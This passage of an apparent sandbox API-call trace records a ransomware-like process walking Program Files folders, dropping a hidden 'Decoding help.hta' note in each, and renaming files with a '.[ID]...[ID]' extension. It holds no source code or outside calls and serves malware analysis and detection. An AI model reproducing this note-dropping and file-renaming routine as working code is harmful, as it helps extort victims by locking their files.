Files\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" [0040.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0040.629] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceSimplifiedShuangPin.txt") returned -1 [0040.629] lstrlenW (lpString="TableTextServiceSimplifiedShuangPin.txt") returned 39 [0040.629] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0040.629] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.629] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="TableTextServiceSimplifiedShuangPin.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" [0040.629] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" [0040.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0040.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.630] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ba4219, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72ba4219, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x742a801, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b9fb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedZhengMa.txt", cAlternateFileName="")) returned 1 [0040.630] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.630] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" [0040.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0040.630] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceSimplifiedZhengMa.txt") returned -1 [0040.630] lstrlenW (lpString="TableTextServiceSimplifiedZhengMa.txt") returned 37 [0040.630] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0040.630] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.630] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="TableTextServiceSimplifiedZhengMa.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" [0040.630] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" [0040.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0040.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.631] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d6d275, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72d6d275, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x742a801, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 1 [0040.631] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.631] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" [0040.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0040.631] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceYi.txt") returned -1 [0040.631] lstrlenW (lpString="TableTextServiceYi.txt") returned 22 [0040.631] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.631] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="TableTextServiceYi.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt" [0040.631] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt" [0040.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0040.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextserviceyi.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextserviceyi.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.632] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d6d275, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72d6d275, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x742a801, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 0 [0040.632] FindClose (in: hFindFile=0x5d7e50 | out: hFindFile=0x5d7e50) returned 1 Thread: id = 257 os_tid = 0x944 [0040.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*", lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80471418, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80471418, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db2f8 [0042.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.247] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80471418, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80471418, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.247] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.247] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8adeec5d, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x4d82, dwReserved0=0x0, dwReserved1=0x0, cFileName="avtransport.xml", cAlternateFileName="")) returned 1 [0042.247] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.247] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.247] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0042.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\media renderer\\decoding help.hta")) returned 0xffffffff [0042.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\media renderer\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ac [0042.768] WriteFile (in: hFile=0x6ac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x132dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x132dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.769] CloseHandle (hObject=0x6ac) returned 1 [0042.770] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.770] lstrcmpiW (lpString1="Decoding help.hta", lpString2="avtransport.xml") returned 1 [0042.770] lstrlenW (lpString="avtransport.xml") returned 15 [0042.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="avtransport.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml" [0042.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml" [0042.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.770] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b1f3147, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="connectionmanager_dmr.xml", cAlternateFileName="")) returned 1 [0042.770] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0042.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0042.771] lstrcmpiW (lpString1="Decoding help.hta", lpString2="connectionmanager_dmr.xml") returned 1 [0042.771] lstrlenW (lpString="connectionmanager_dmr.xml") returned 25 [0042.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="connectionmanager_dmr.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" [0042.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" [0042.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.771] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_120.jpg", cAlternateFileName="")) returned 1 [0042.771] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0042.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0042.771] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DMR_120.jpg") returned -1 [0042.771] lstrlenW (lpString="DMR_120.jpg") returned 11 [0042.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="DMR_120.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" [0042.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" [0042.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0042.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.771] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828ce928, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828ce928, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x3a1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_120.png", cAlternateFileName="")) returned 1 [0042.772] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0042.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0042.772] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DMR_120.png") returned -1 [0042.772] lstrlenW (lpString="DMR_120.png") returned 11 [0042.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="DMR_120.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" [0042.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" [0042.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.[ID]g9uZrLhJaygpwRm1[ID]" [0042.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.772] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828a87cb, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828a87cb, ftLastAccessTime.dwHighDateTime=0x1ca0419, 